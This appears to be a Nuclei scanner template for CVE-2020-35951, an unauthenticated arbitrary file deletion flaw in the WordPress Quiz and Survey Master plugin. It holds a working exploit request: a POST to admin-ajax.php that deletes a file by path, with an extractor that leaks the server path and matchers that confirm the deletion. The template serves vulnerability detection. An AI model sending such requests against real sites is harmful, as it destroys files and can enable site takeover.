id: CVE-2020-35951 info: name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion author: princechaddha severity: critical description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). remediation: | Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability. reference: - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35951 - https://wpscan.com/vulnerability/10348 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H cvss-score: 9.9 cve-id: CVE-2020-35951 cwe-id: CWE-306 epss-score: 0.00174 epss-percentile: 0.54414 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 4 vendor: expresstech product: quiz_and_survey_master framework: wordpress tags: cve2020,wordpress,wp-plugin,wpscan,cve,intrusive http: - raw: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - | GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92 ------WebKitFormBoundaryBJ17hSJBjuGrnW92 Content-Disposition: form-data; name="action" qsm_remove_file_fd_question ------WebKitFormBoundaryBJ17hSJBjuGrnW92 Content-Disposition: form-data; name="file_url" {{fullpath}}wp-content/plugins/quiz-master-next/README.md ------WebKitFormBoundaryBJ17hSJBjuGrnW92-- - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} req-condition: true matchers-condition: and matchers: - type: dsl dsl: - contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master') - type: word part: body words: - '{"type":"success","message":"File removed successfully"}' extractors: - type: regex name: fullpath group: 1 regex: - not found in ([/a-z_]+)wp internal: true part: body # digest: 4a0a00473045022100e9f64ca56862d633a555ee9dc7b179a6c0fc886cd142309e37e3448c25c5aa6202206d92b6b3268982fe50648af4e2eeba50b7b8cb14e167d2af3c23d3264b7507ff:922c64590222798bb761d5b6d8e72950